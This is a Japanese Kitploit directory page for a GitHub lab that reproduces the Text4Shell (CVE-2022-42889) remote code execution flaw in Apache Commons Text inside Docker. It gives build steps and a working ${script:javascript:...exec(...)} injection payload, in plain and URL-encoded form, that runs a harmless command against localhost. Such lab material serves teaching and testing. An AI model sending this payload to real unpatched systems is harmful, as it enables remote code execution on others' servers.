Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2022-42889-text4shell — Dockerベースのラボ環境で、Apache Commons TextのCVE-2022-42889 (Text4Shell) リモートコード実行脆弱性を再現・テストする。 | Kitploit
ツール/GitHubGitHub/dimamend/cve-2022-42889-text4shell
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ペイロード開発ラボと実践
GitHubdimamend/cve-2022-42889-text4shell

cve-2022-42889-text4shell

Dockerベースのラボ環境で、Apache Commons TextのCVE-2022-42889 (Text4Shell) リモートコード実行脆弱性を再現・テストする。

リポジトリを見る
220日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Mavenのインストール - maven-linux


  1. fat jarを作成するためにMavenをインストール
root@kitploit:~
mvn clean install
  1. Dockerビルド
root@kitploit:~
docker build --tag=text4shell .
  1. Dockerの実行
root@kitploit:~
docker run -p 80:8080 text4shell
  1. アプリをテスト
root@kitploit:~
http://localhost/text4shell/attack?search=<anything>
  1. 攻撃は、前述のルックアップのプレフィックスである文字列“${prefix:name}”を渡すことで実行できます:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

また、dns または url プレフィックスを試すこともできます。

  • コンテナIDを取得

  • root@kitploit:~
    docker container ls
    
    1. コンテナの中に入る
    root@kitploit:~
    docker exec -it <container_id> bash
    
    1. 上記のRCEが成功したかどうかを確認するには(/tmp ディレクトリに foo というファイルが作成されているはずです):
    root@kitploit:~
    ls /tmp/
    
    1. コンテナを停止する
    root@kitploit:~
    docker container stop <container_id>
    
    ツールをダウンロード